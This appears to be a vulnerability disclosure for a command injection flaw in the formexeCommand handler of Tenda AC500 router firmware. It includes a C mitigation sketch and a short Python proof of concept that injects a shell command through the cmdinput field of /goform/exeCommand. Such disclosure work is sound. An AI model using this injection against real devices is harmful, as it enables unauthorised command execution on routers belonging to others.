formexecommand_cmdi.md

File metadata and controls

27 lines (17 loc) · 1.04 KB

Overview

Affected version

AC500 V2.0.1.9(1307)

Vulnerability details

In the Tenda AC500 V2.0.1.9(1307) firmware, we discovered a command injection vulnerability in the cmdinput parameter of the formexeCommand function: the str variable is assigned to the cmd_buf variable, which is used directly in the doSystemCmd function, causing arbitrary command execution. The user-provided cmdinput can trigger this security vulnerability.
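
As a mitigation sketch for the flow described above (an added example, not Tenda's code and not part of the original report): instead of copying cmdinput into a string that a shell parses, the handler can accept only a fixed set of commands with one strictly validated argument and build an argv[] for an exec-family call. The function names, the allowed command set and the 63-character limit are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Assumed command set for illustration; the firmware's intended set is not on the page. */
static const char *const ALLOWED_CMDS[] = { "ping", "traceroute", "nslookup" };

/* Target argument: host name or IP literal characters only, bounded, not option-like. */
static int target_is_safe(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 63 || s[0] == '-')
        return 0;
    return strspn(s, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
                     "0123456789.-:") == n;
}

/*
 * Turn "cmd target" into an argv[] for an exec-family call, so that no shell
 * ever parses the request. buf receives a private copy of cmdinput and must
 * outlive argv. Returns 0 and fills argv on accept, -1 on reject.
 */
int build_argv(const char *cmdinput, char *buf, size_t buflen, const char *argv[3])
{
    size_t len, i;
    char *sp;

    if (cmdinput == NULL || (len = strlen(cmdinput)) >= buflen)
        return -1;                      /* missing or oversized input */
    memcpy(buf, cmdinput, len + 1);

    sp = strchr(buf, ' ');              /* exactly one separator is expected */
    if (sp == NULL)
        return -1;
    *sp = '\0';

    for (i = 0; i < sizeof(ALLOWED_CMDS) / sizeof(ALLOWED_CMDS[0]); i++) {
        if (strcmp(buf, ALLOWED_CMDS[i]) == 0 && target_is_safe(sp + 1)) {
            argv[0] = ALLOWED_CMDS[i];  /* command name comes from the table */
            argv[1] = sp + 1;           /* validated target, no metacharacters */
            argv[2] = NULL;
            return 0;
        }
    }
    return -1;                          /* unknown command or unsafe target */
}
```

Anything containing `;`, whitespace beyond the single separator, or other characters outside the target alphabet is rejected before any process is started, which covers the `ls;` value used in the POC.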


POC

```python
import requests
IP = "192.168.84.102"
url = f"http://{IP}/goform/exeCommand"
data = "cmdinput=ls;"
ret = requests.post(url=url,data=data)
```
